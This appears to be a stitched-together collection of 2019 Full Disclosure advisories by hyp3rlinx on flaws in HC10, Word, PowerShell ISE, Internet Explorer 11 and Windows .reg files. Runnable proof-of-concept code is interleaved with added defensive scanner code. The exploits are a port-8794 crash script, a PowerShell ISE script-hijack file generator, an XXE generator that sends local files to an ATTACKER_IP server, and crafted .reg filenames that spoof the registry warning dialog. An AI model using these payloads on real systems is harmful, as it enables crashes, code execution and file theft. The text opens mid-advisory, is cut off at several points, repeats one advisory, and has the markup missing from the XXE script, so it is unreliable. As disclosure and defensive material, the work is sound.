BOOM! No hash verified, but we do get arbitrary code execution...

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
Vendor Notification: June 3, 2019
MSRC Response: "The Checksum Integrity Verifier tool is not supported by Microsoft." : June 7, 2019
July 4, 2019 : Public Disclosure
[FD] CVE-2019-12323 / HC10 HC.Server Service 10.14 / Remote Invalid Pointer Write
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/HC10-HC.SERVER-10.14-REMOTE-INVALID-POINTER-WRITE.txt
[+] ISR: ApparitionSec

[Vendor]
www.hostingcontroller.com

[Product]
HC10 HC.Server Service 10.14

HC10 is a unified hosting automation control panel for web hosts and Cloud based service providers to manage both Windows & Linux servers simultaneously as part of a single cluster. HC works on an N-tier user model.

[Vulnerability Type]
Remote Invalid Pointer Write

[CVE Reference]
CVE-2019-12323

[Security Issue]
The HC.Server service in Hosting Controller HC10 10.14 allows an Invalid Pointer Write DoS if attackers can reach the service on port 8794.

In addition, this can potentially be leveraged for post-exploit persistence with SYSTEM privileges if physical access or malware is involved. If a physical attacker or malware can set its own program as the service's failure recovery option, it can be used to maintain persistence. Afterwards, it can be triggered by sending a malicious request to DoS the service, which in turn starts the attacker's recovery program. The attacker's program can then try restarting the affected service, to try and stay unnoticed, by calling "sc start HCServerService".

Service failure recovery options ("enabling actions for stops or errors") can be set in the service's "Recovery" properties tab or on the command line.

Authentication is not required to reach the vulnerable service; this was tested successfully on Windows 7/10.

SERVICE_NAME: HCServerService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : "C:\Program Files\Hosting Controller\Provisioning\HC.Server.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HC Server Service
DEPENDENCIES : HCProvisioningService
SERVICE_START_NAME : LocalSystem

Crash Dump:

INVALID_POINTER_WRITE_EXPLOITABLE

CONTEXT: (.ecxr)
rax=0bfd rbx=00df94f0 rcx=03743db166a9
rdx=8000 rsi=00b4 rdi=
rip=000140025b6c rsp=0118f570 rbp=
r8=001f r9=06fe r10=0603
r11=00df0158 r12= r13=
r14= r15=
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
HC_Server+0x25b6c:
0001`40025b6c c68404d00100 mov byte ptr [rsp+rax+1D0h],0 ss:`0119033d=??
Resetting default scope

FAULTING_IP:
HC_Server+25b6c
0001`40025b6c c68404d00100 mov byte ptr [rsp+rax+1D0h],0

EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 000140025b6c (HC_Server+0x00025b6c)
ExceptionCode: c005 (Access violation)
ExceptionFlags:
NumberParameters: 2
Parameter[0]: 0001
Parameter[1]: 0119033d
Attempt to write to address 0119033d

PROCESS_NAME: HC.Server.exe

[Exploit/POC]

1) Configure the HCServerService recovery failure options to an arbitrary program.
2) Trigger the remote invalid pointer write to gain persistence with SYSTEM privileges.

# Python 2 script (raw_input / print statement)
from socket import *

IP = raw_input("[+] HC Server Service IP ")
PORT = 8794
payload = "A"*4000
s=socket(AF_INET,SOCK_STREAM)
s.connect((IP, PORT))
s.send(payload)
s.close()
print "Triggering HC10 Server Service Xploit"
print "hyp3rlinx"

[Network Access]
Remote

[Severity]
Medium

[Disclosure Timeline]
Vendor Notification: May 14, 2019
No reply
Second notification: May 21, 2019
Vendor "will change the implementation soon in any of forthcoming installer." : May 22, 2019
mitre assign CVE: May 27, 2019
Vendor : "New installer to be released June 13, 2019"
June 16, 2019 : Public Disclosure
[FD] Microsoft Word (2016) / Deceptive File Reference Vuln
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WORD-DECEPTIVE-FILE-REFERENCE.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program

[Vendor]
www.microsoft.com

[Product]
Microsoft Word 2016

[Vulnerability Type]
Deceptive File Reference

[References]
ZDI-CAN-7949

[Security Issue]
When an MS Word ".docx" file contains a hyperlink to another file, Word will run the first file it finds in that directory with a valid extension. But if another "empty" file with the same name as the target executable exists and has no file extension, Word presents the extension-less file in its Security warning dialog box without showing the extension type. Because the extension is suppressed it makes the file seem harmless, and the file can be masked to appear as just a folder, etc. This can potentially trick a user into running unexpected code, but will only work when you have an additional file of the same name with NO extension on it.

[Exploit/POC]

1) Create a directory "PoC"
2) Create a folder in the PoC directory named "Downloads Folder"
3) Create a .BAT file named "Downloads Folder.bat"; in the .BAT create some command like "start calc.exe"
4) Create an empty file named "Downloads Folder" with no file extension
5) Create the Word ".docx" file with a hyperlink pointing to "PoC/Downloads Folder/Downloads Folder"

Upon opening the link, Word will give the user a vague dialog box asking if they want to open the file. However, the prompt shows an apparent folder structure and no file extension (.exe, .com etc.) is visible or displayed to the end user. Click the link to open what looks to be a folder and then BOOM! the .BAT file runs instead. Of course any executable will do, .EXE etc.

[Network Access]
Local

[Severity]
High

[POC Video URL]
https://www.youtube.com/watch?v=irxkV_qGG9Y

[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program : 2019-01-25
Case officially contracted to ZDI : 2019-02-06
Vendor Disclosure : 2019-02-15 submitted to the vendor as ZDI-CAN-7949.
ZDI Response : "We have synced with the vendor and they have resolved that this case does not meet the bar for security servicing. Therefore we will proceed to close it on our end."
2019-06-14 : Public Disclosure
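The masking condition described above (an extension-less file sitting next to a runnable file of the same base name) can be audited with a directory check. This is an added example in Python, not code from the advisory; the list of runnable extensions is a constructed assumption for the demo, and the sample listing mirrors the PoC directory.

```python
import os
from typing import Dict, List

# Extensions that launch a program when "opened". Constructed list for this
# demo, not exhaustive.
RUNNABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".vbs", ".js", ".ps1", ".scr", ".hta"}


def find_masked_executables(listing: List[str]) -> Dict[str, List[str]]:
    """Map every extension-less name in `listing` to the runnable siblings that
    share its base name, i.e. the files a hyperlink to the bare name would run.

    Matching is case-insensitive because Windows filename lookup is.
    """
    runnable_by_stem: Dict[str, List[str]] = {}
    bare_names: List[str] = []
    for name in listing:
        stem, ext = os.path.splitext(name)
        if ext == "":
            bare_names.append(name)
        elif ext.lower() in RUNNABLE_EXTS:
            runnable_by_stem.setdefault(stem.lower(), []).append(name)
    return {
        bare: sorted(runnable_by_stem[bare.lower()])
        for bare in bare_names
        if bare.lower() in runnable_by_stem
    }


def audit_directory(path: str) -> Dict[str, List[str]]:
    """Run the same check against a real directory. Only regular files are
    considered: a bare name that is a sub-directory cannot be the "empty file"
    mask the advisory describes."""
    files = [n for n in os.listdir(path) if os.path.isfile(os.path.join(path, n))]
    return find_masked_executables(files)


# Constructed listing mirroring the PoC's "Downloads Folder" directory.
SAMPLE_LISTING = ["Downloads Folder", "Downloads Folder.bat", "notes.txt", "setup", "README"]

if __name__ == "__main__":
    for bare, siblings in find_masked_executables(SAMPLE_LISTING).items():
        print(f"'{bare}' has no extension but would launch: {', '.join(siblings)}")
```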
[FD] Windows PowerShell ISE / Filename Parsing Flaw Remote Code Execution 0day
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/WINDOWS-POWERSHELL-ISE-FILENAME-PARSING-FLAW-RCE-0DAY.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program

[Vendor]
www.microsoft.com

[Product]
Windows PowerShell ISE

The Windows PowerShell Integrated Scripting Environment (ISE) is a host application for Windows PowerShell. In the ISE, you can run commands and write, test, and debug scripts in a single Windows-based graphic user interface.

[Vulnerability Type]
Filename Parsing Flaw Remote Code Execution 0day

[References]
ZDI-CAN-8005

[Security Issue]
Windows PowerShell ISE will execute wrongly supplied code when debugging specially crafted PowerShell scripts that contain array brackets as part of the filename. This can result in ISE executing attacker-supplied scripts pointed to by the filename and not the "trusted" PS file currently loaded and being viewed by a user in the host application. This undermines the integrity of PowerShell ISE, allowing potential unexpected remote code execution.

In PowerShell, brackets are used to access array elements.

PS C:\> $a=1..10
PS C:\> $a[4]
5

However, when brackets are used as part of the filename, they can be used to hijack the currently loaded file in place of another malicious file. That file must be named with a single character value which is also found in our specially crafted filename. The requirement is that both files must reside in the same directory.

Example: if a file named [HelloWorldTutoria1].ps1 resides alongside a file named 1.ps1, it will create a script hijacking condition. Note, the last letter is a number "1", not a lowercase "L".

Other things I discovered playing with PS filenames: we can target scripts using a single alphabetic or numeric char and certain symbols. PowerShell scripts with only a single quote also work; [Pwned'].ps1 will load and execute ===> '.ps1 if debugged from the vuln ISE application.

These chars also get the job done: "$" "_" "#" "^" plus any single case-insensitive letter a-z or number 0-9.

[Hello_World].ps1 > _.ps1
[Hello].ps1 will execute this instead => h.ps1

Dashes "-" throw the following error: "The specified wildcard character pattern is not valid: [Hello-World].ps1" when pointing to another PS file named -.ps1, and seem to be treated sort of like a meta-character.

[pw3d].ps1 <= expected to execute
3.ps1 <= actually executed

This exploits the trust between PowerShell ISE and the end user. So scripts debugged locally or over a network share display "trusted" code in ISE that is expected to run. However, when the user debugs the script, a different script gets executed. Interestingly, that second script does NOT get loaded into PowerShell ISE upon execution, so a user may not see anything amiss.

User interaction is required for a successful attack to occur, and obviously running any unknown PowerShell script can be dangerous. Again, this exploit takes advantage of "trust": users can see and read the code and will trust it as everything looks just fine, and yet... still they get PWNED!

Tested successfully on Win7/10

Long live user interaction! lol...

[POC Video URL]
https://www.youtube.com/watch?v=T2I_-iUPaFw

[Exploit/POC]

After opening PS files in ISE, set the execution policy so you can test without issues.

set-executionpolicy unrestricted -force

PS scripts over network shares may get a 'RemoteSigned' security policy issue, so run the command below.

set-executionpolicy unrestricted -force process

Choose 'R' to run once.

The Python script below will create two .ps1 files to demonstrate the vulnerable condition. Examine the code, what does it say? It reads... Write-Output "Hello World!"... now run it... BAM! the other PS script executes!

#PowerShell ISE 0day Xploit
#ZDI-CAN-8005
#ZDI CVSS: 7.0
#hyp3rlinx
#ApparitionSec
# Python 2 script (print statement, str written in "wb" mode)

fname1="[HelloWorldTutoria1].ps1"   #Expected code to run is 'HelloWorld!'
fname2="1.ps1"                      #Actual code executed is calc.exe for Poc
evil_code="start calc.exe"          #Edit to suit your needs.
c=0

payload1='Write-Output "Hello World!"'
payload2=evil_code+"\n"+'Write-Output "Hello World!"'

def mk_ps_hijack_script():
    # Writes fname1/payload1 on the first call, then recurses once for fname2/payload2.
    global c
    c+=1
    f=open(globals()["fname"+str(c)],"wb")
    f.write(globals()["payload"+str(c)])
    f.close()
    if c<2:
        mk_ps_hijack_script()

if __name__=="__main__":
    mk_ps_hijack_script()
    print "PowerShell ISE Xploit 0day Files Created!"
    print "Discovery by hyp3rlinx"
    print "ZDI-CAN-8005"

[Network Access]
Remote

[Severity]
High

[Disclosure Timeline]
ZDI Case opened : 2019-02-06
Case off
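A pre-debug check for the bracket-filename condition described above, as an added example that is not part of the advisory or its PoC. It assumes PowerShell's `[...]` wildcard classes can be approximated with Python's fnmatch character classes compared case-insensitively (the advisory reports case-insensitive matching); the directory listing is constructed.

```python
import fnmatch
from typing import List


def is_wildcard_name(name: str) -> bool:
    """True if PowerShell would parse this path as a wildcard pattern."""
    return any(ch in name for ch in "[]*?")


def shadow_candidates(script_name: str, listing: List[str]) -> List[str]:
    """Return the other files in `listing` that the script's own name resolves
    to when it is treated as a wildcard.

    "[HelloWorldTutoria1].ps1" is both a literal file name and the pattern
    "one character from the class, then .ps1", so 1.ps1 and h.ps1 qualify.
    Assumption: fnmatch's character-class semantics are close enough to
    PowerShell's for single-character targets like the advisory's examples.
    """
    if not is_wildcard_name(script_name):
        return []
    pattern = script_name.lower()
    hits: List[str] = []
    for entry in listing:
        if entry.lower() == script_name.lower():
            continue  # the literal file the user believes will run
        if fnmatch.fnmatchcase(entry.lower(), pattern):
            hits.append(entry)
    return sorted(hits)


def check_before_debug(script_name: str, listing: List[str]) -> str:
    """One-line verdict a wrapper script could print before handing a file to ISE."""
    hits = shadow_candidates(script_name, listing)
    if not hits:
        return f"OK: {script_name} is not shadowed"
    return f"WARNING: {script_name} is a wildcard that also matches {', '.join(hits)}"


# Constructed directory listing reproducing the advisory's setup.
SAMPLE_LISTING = ["[HelloWorldTutoria1].ps1", "1.ps1", "h.ps1", "l.ps1", "12.ps1", "readme.txt"]

if __name__ == "__main__":
    print(check_before_debug("[HelloWorldTutoria1].ps1", SAMPLE_LISTING))
    print(check_before_debug("Hello.ps1", SAMPLE_LISTING))
```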
Re: [FD] Microsoft Internet Explorer v11 / XML External Entity Injection 0day
Vimeo reinstated my account a few hours later but I switched to YouTube for now.. but will check those out. Thank you for that...

hyp3rlinx

On Tue, Apr 16, 2019 at 4:12 AM bo0od wrote:
> have your own videos either on one of the PeerTubes instances or have
> your own instance.
>
> https://joinpeertube.org/en/
>
> other good alternative would be:
>
> https://mediagoblin.org/pages/tour.html
>
> Enjoy!
>
> hyp3rlinx:
> > vimeo removed my account for no good reason so new POC url is included.
[FD] Microsoft Internet Explorer v11 / XML External Entity Injection 0day
vimeo removed my account for no good reason so new POC url is included.

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Microsoft Internet Explorer v11
(latest version)

Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.

[Vulnerability Type]
XML External Entity Injection

[CVE Reference]
N/A

[Security Issue]
Internet Explorer is vulnerable to an XML External Entity attack if a user opens a specially crafted .MHT file locally.

This can allow remote attackers to potentially exfiltrate local files and conduct remote reconnaissance on locally installed program version information. For example, a request for "c:\Python27\NEWS.txt" can return version information for that program.

Upon opening the malicious ".MHT" file locally it should launch Internet Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K" and other interactions like right click "Print Preview" or "Print" commands on the web page may also trigger the XXE vulnerability. However, a simple call to the window.print() Javascript function should do the trick without requiring any user interaction with the webpage.

Importantly, if files are downloaded from the web in a compressed archive and opened using certain archive utilities, MOTW may not work as advertised.

Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP" users will get a security warning bar in IE and be prompted to activate blocked content. However, when opening a specially crafted .MHT file using malicious markup tags the user will get no such active content or security bar warnings.

e.g.

C:\sec>python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -
127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci] HTTP/1.1" 200 -

Tested successfully in the latest Internet Explorer Browser v11 with latest security patches on Win7/10 and Server 2012 R2.

[POC/Video URL]
https://www.youtube.com/watch?v=fbLNbCjgJeY

[Exploit/POC]
POC to exfil the Windows "system.ini" file.
Note: Edit the attacker server IP in the script to suit your needs.

1) Use the script below to create the "datatears.xml" XML and the XXE-embedded "msie-xxe-0day.mht" MHT file.

2) python -m SimpleHTTPServer

3) Place the generated "datatears.xml" in the Python server web-root.

4) Open the generated "msie-xxe-0day.mht" file, watch your files be exfiltrated.

#Microsoft Internet Explorer XXE 0day
#Creates malicious XXE .MHT and XML files
#Open the MHT file in MSIE locally, should exfil system.ini
#By hyp3rlinx
#ApparitionSec
# Python 2 script (print statement, str written in "wb" mode).
# NOTE: the HTML and XML markup inside the string literals below is missing
# from this copy of the advisory (only the text nodes survived), so the files
# this script writes are incomplete.

ATTACKER_IP="localhost"
PORT="8000"

mht_file=(
'From:\n'
'Subject:\n'
'Date:\n'
'MIME-Version: 1.0\n'
'Content-Type: multipart/related; type="text/html";\n'
'\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001"\n'
'This is a multi-part message in MIME format.\n\n\n'
'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001\n'
'Content-Type: text/html; charset="UTF-8"\n'
'Content-Location: main.htm\n\n'
'http://www.w3.org/TR/html4/transitional.dtd";>\n'
'\n'
'\n'
'\n'
'MSIE XXE 0day\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'\n'
'%sp;\n'
'%param1;\n'
']>\n'
'&exfil;\n'
'&exfil;\n'
'&exfil;\n'
'&exfil;\n'
'\n'
'window.print();\n'
'\n'
'\n'
'\n'
'MSIE XML External Entity 0day PoC.\n'
'Discovery: hyp3rlinx\n'
'ApparitionSec\n'
'\n'
'\n'
'\n'
'\n'
'\n\n\n'
'--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001--'
)

xml_file=(
'\n'
'">\n'
'\n'
'">\n'
)

def mk_msie_0day_filez(f,p):
    f=open(f,"wb")
    f.write(p)
    f.close()

if __name__ == "__main__":
    mk_msie_0day_filez("msie-xxe-0day.mht",mht_file)
    mk_msie_0day_filez("datatears.xml",xml_file)
    print "Microsoft Internet Explorer XML External Entity 0day PoC."
    print "Files msie-xxe-0day.mht and datatears.xml Created!"
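The two XXE carriers in these advisories (the uncompiled ".chm.chm" help file earlier on this page and the .MHT file above) can be pre-screened statically before a user ever opens them. This is an added example in Python, not the advisory's code; the regexes and sample inputs are constructed, and the malicious sample only reproduces the remote-DTD structure (%dtd; pulling payload.dtd) that the PoCs describe.

```python
import re
from dataclasses import dataclass, field
from typing import List, Set

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# <!ENTITY [%] name SYSTEM|PUBLIC "literal"  (a PUBLIC entity carries a second
# literal, the system id; the first literal is enough to know it is external)
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?([\w.\-]+)\s+(SYSTEM|PUBLIC)\s+(\"[^\"]*\"|'[^']*')",
    re.IGNORECASE,
)
PARAM_REF_RE = re.compile(r"%([\w.\-]+);")
REMOTE_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
LOCAL_RE = re.compile(r"^(file:|[a-z]:[\\/])", re.IGNORECASE)


@dataclass
class Finding:
    path: str
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def scan_markup(path: str, text: str) -> Finding:
    """Static pre-screen for the delivery tricks in the CHM and MHT advisories."""
    f = Finding(path)
    if path.lower().endswith(".chm.chm"):
        f.reasons.append("double .chm extension (uncompiled CHM opened by hh.exe)")
    if not DOCTYPE_RE.search(text):
        return f  # no DTD, so no entity declarations to worry about
    declared_params: Set[str] = set()
    for param, name, kind, literal in ENTITY_RE.findall(text):
        target = literal[1:-1]
        if param.strip():
            declared_params.add(name)
            f.reasons.append(f"parameter entity %{name}; loads external resource: {target}")
        elif REMOTE_RE.match(target):
            f.reasons.append(f"external entity &{name}; fetches {target}")
        elif LOCAL_RE.match(target):
            f.reasons.append(f"external entity &{name}; reads local file {target}")
    # A declared parameter entity that is then expanded inside the internal
    # subset (%dtd;) is the remote-DTD pattern both PoCs rely on.
    if declared_params & set(PARAM_REF_RE.findall(text)):
        f.reasons.append("parameter entity expanded inside the DOCTYPE internal subset")
    return f


# Constructed samples. The malicious one mirrors the structure the advisories
# describe; the benign one is a plain MHT with a standard HTML DOCTYPE and no
# entity declarations, which must not be flagged.
MALICIOUS_XML = """<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd">
%dtd;
]>
<data>&send;</data>
"""

BENIGN_MHT = """MIME-Version: 1.0
Content-Type: multipart/related; type="text/html"; boundary="=_b1"

--=_b1
Content-Type: text/html; charset="UTF-8"
Content-Location: main.htm

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/transitional.dtd">
<html><body><p>Release notes</p></body></html>
--=_b1--
"""

if __name__ == "__main__":
    for name, body in (("XXE.chm.chm", MALICIOUS_XML), ("notes.mht", BENIGN_MHT)):
        result = scan_markup(name, body)
        print(name, "SUSPICIOUS" if result.suspicious else "clean", result.reasons)
```

Because it never expands anything, the scan is safe to run on untrusted samples; it is a triage filter, not a replacement for disabling external entity resolution in the consuming application.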
[FD] [**UPDATED] Microsoft Windows .Reg File / Dialog Box Message Spoofing 0day
Added a few things I had previously left out that should have been mentioned earlier.

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values. .reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry.

[Vulnerability Type]
Windows .Reg File Dialog Box Message Spoofing

[CVE Reference]
N/A

[Security Issue]
The Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user. This can potentially trick unsavvy users into choosing the wrong selection shown on the dialog box. Furthermore, we can deny the registry editor its ability to show the default secondary status dialog box (Win 10), thereby hiding the fact that our attack was successful.

Normally when a user opens a .reg file, UAC will launch (if the user is running as Admin); if targeting a non-privileged user we can still hijack HKCU reg settings without having to deal with UAC. After that they will get the registry security warning dialog box asking them if they "trust the source" and "Are you sure you want to continue?" etc., and will also have a choice of either 'Yes' or 'No' to select from.

However, we can inject our own messages thru the filename to direct the user to wrongly click "Yes", as the expected "Are you sure you want to continue?" dialog box message is under our control. The registry dialog echoes back the filename plus any text we add, and allows us to terminate part of its default security warning message. We achieve this using % encoded characters in the filename like %n or %r and %0.

Example: the "do not add it to the registry" and "Are you sure you want to continue?" default warning messages can be done away with using %0. This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes" or whatever else we like, potentially making a user think they are cancelling the registry import, as the security warning dialog box is now lying to them.

Denial of secondary registry editor status dialog box (hiding successful attacks) in Windows 10:

Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us "the keys and values contained in have been successfully added to the registry". We can obstruct that behavior to deny this secondary registry editor dialog from appearing by tacking on a (null) right before the end of our filename using %1 or %25, like:

"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

If you don't want to use (null), use %3; it will display an Asian character instead but still prevents the secondary registry dialog box. You will have to manually refresh the registry key written to in order to see the values stored when using these dialog denial of service methods.

Note: Denial of the secondary dialog box seems to only work on Windows 10.

Behaviors I discovered playing with registry filenames that affect the dialog box; depending on the Windows OS version you will get different results.

% - can be used for obfuscation e.g. %h%a%t%e = hate
%b will create white-space
%n makes a newline
%r makes a newline
%1 creates (null) - important as we prevent the second registry dialog from appearing after a successful import!
%0 Important, terminates string
%25 (Windows 10) creates (null) - important as we prevent the second registry dialog from appearing after a successful import!
%3 - important as we prevent the second registry dialog from appearing after a successful import! (but shows Asian char)
%5 (Windows 10) duplicates the default registry dialog box message "n" times, once per %5 injected into the filename
%25 (Windows 7) duplicates the default registry dialog box message "n" times, once per %25 injected into the filename
%2525 prevents registry editor from opening
%169 will show our junky filename in the dialog box (we don't want that)
%3, %197, %17 and some others change the default language shown in the registry dialog box to Asian characters etc.

Each injected character can be separated by a percent "%" sign without messing up our spoofed message; we can leverage this to obfuscate the end of the filename. We then use %0 to terminate the message string so that the second .reg extension and default registry messages are not displayed
[FD] Microsoft Windows .Reg File / Dialog Box Message Spoofing Vulnerability
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values. .reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry.

[Vulnerability Type]
Windows .Reg File Dialog Box Message Spoofing

[CVE Reference]
N/A

[Security Issue]
The Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user. This can potentially trick unsavvy users into choosing the wrong selection shown on the dialog box. Furthermore, we can deny the registry editor its ability to show the default secondary status dialog box (Win 10), thereby hiding the fact that our attack was successful.

Normally when a user opens a .reg file UAC will launch, after which they get the registry security warning dialog box asking whether they "trust the source", "Are you sure you want to continue?" etc., with a choice of either 'Yes' or 'No' to select from. However, we can inject our own messages through the filename to direct the user to wrongly click "Yes", as the expected "Are you sure you want to continue?" dialog box message is under our control.

The registry dialog echoes back the filename plus any text we add and allows us to terminate part of its default security warning message. We achieve this using %-encoded characters in the filename like %n, %r and %0. For example, the "do not add it to the registry" and "Are you sure you want to continue?" default warning messages can be done away with using %0. This spoofing flaw lets us change the "Are you sure you want to continue?" warning message to instead read "Click Yes" or whatever else we like, potentially making a user think they are cancelling the registry import, as the security warning dialog box is now lying to them.

Denial of secondary registry editor status dialog box (hiding successful attacks) in Windows 10:

Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us "the keys and values contained in have been successfully added to the registry". We can obstruct that behavior and deny this secondary registry editor dialog from appearing by tacking on a (null) right before the end of our filename using %1 or %25, like:

"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

If you don't want to use (null), use %3; it will display an Asian character instead but still prevents the secondary registry dialog box. You will have to manually refresh the registry written to in order to see the values stored when using these dialog denial of service methods.

Note: Denial of the secondary dialog box seems to only work on Windows 10.

Behaviors I discovered playing with registry filenames that affect the dialog box; depending on the Windows OS version you will get different results.

% - can be used for obfuscation, e.g. %h%a%t%e = hate
%b - creates white-space
%n - makes a newline
%r - makes a newline
%1 - creates (null); important as we prevent the second registry dialog from appearing after a successful import!
%0 - important: terminates the string
%25 (Windows 10) - creates (null); important as we prevent the second registry dialog from appearing after a successful import!
%3 - important as we prevent the second registry dialog from appearing after a successful import! (but shows an Asian char)
%5 (Windows 10) - duplicates the default registry dialog box message "n" times, once per %5 injected into the filename
%25 (Windows 7) - duplicates the default registry dialog box message "n" times, once per %25 injected into the filename
%2525 - prevents the registry editor from opening
%169 - will show our junky filename in the dialog box (we don't want that)
%3, %197, %17 and some others - change the default language shown in the registry dialog box to Asian characters etc.

Each injected character can be separated by a percent "%" sign without messing up our spoofed message; we can leverage this to obfuscate the end of the filename. We then use %0 to terminate the message string so that the second .reg extension and default registry messages are not displayed in the registry dialog box.

The filename "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" will show as "Microsoft-Security-Update-v1.2-Windows-10.reg" in the re
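A defender-side check for .reg filenames that use these escapes, added here as an example and not the author's code: it tokenizes the %-codes listed above, models what the dialog would echo back (the effect of each code is taken from the list above, not from Windows itself; %r and %n are each assumed to render as one newline), and reports why the name is deceptive.

```python
import re
from typing import List, NamedTuple

# Modelled effects of the %-codes the advisory lists. This is a model of the
# described dialog behaviour, not Windows code.
ESCAPE_RE = re.compile(r"%(2525|197|169|25|17|\d|[^%])")
TERMINATOR = "0"               # %0 ends the text the dialog shows
NULL_CODES = {"1", "25"}       # insert (null): post-import status dialog suppressed
NEWLINE_CODES = {"n", "r"}     # assumed: one newline each
SPACE_CODE = "b"


class RegNameReport(NamedTuple):
    filename: str
    displayed: str          # what the warning dialog would echo back
    hidden: str             # tail after %0 that the dialog never shows
    escapes: List[str]      # every %-code, in order of appearance
    suppress_status: bool   # (null) present: second dialog suppressed
    reasons: List[str]

    @property
    def spoofed(self) -> bool:
        return bool(self.reasons)


def analyze_reg_filename(name: str) -> RegNameReport:
    """Render the dialog text for a .reg filename and list why it is deceptive."""
    shown, escapes, reasons = [], [], []
    suppress, hidden, pos = False, "", 0
    while pos < len(name):
        m = ESCAPE_RE.match(name, pos)
        if not m:                      # ordinary character
            shown.append(name[pos])
            pos += 1
            continue
        code = m.group(1)
        escapes.append(code)
        pos = m.end()
        if code == TERMINATOR:
            hidden = name[pos:]        # real extension and the rest stay unseen
            break
        if code in NULL_CODES:
            suppress = True
        elif code in NEWLINE_CODES:
            shown.append("\n")
        elif code == SPACE_CODE:
            shown.append(" ")
        elif not code.isdigit():
            shown.append(code)         # %h -> h: plain obfuscation
        # other numeric codes (language / duplication quirks) are not rendered
    displayed = "".join(shown)
    if hidden:
        reasons.append("%0 terminates the dialog text; hidden tail: " + repr(hidden))
    if "\n" in displayed:
        reasons.append("newline injected: attacker text sits on its own dialog line")
    if suppress:
        reasons.append("(null) injected: post-import status dialog suppressed")
    if escapes and displayed != name:
        reasons.append("dialog text differs from the real filename")
    if ".reg" in displayed.lower() and hidden.lower().endswith(".reg"):
        reasons.append("double .reg extension: visible name ends in .reg before the real one")
    return RegNameReport(name, displayed, hidden, escapes, suppress, reasons)


if __name__ == "__main__":
    sample = "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"
    for n in (sample, "backup.reg"):
        r = analyze_reg_filename(n)
        print(n, "-> spoofed:", r.spoofed)
        print("  dialog shows:", repr(r.displayed))
        for reason in r.reasons:
            print("  -", reason)
```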
[FD] Microsoft Windows .CONTACT File / HTML Injection Mailto: Remote Code Execution
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
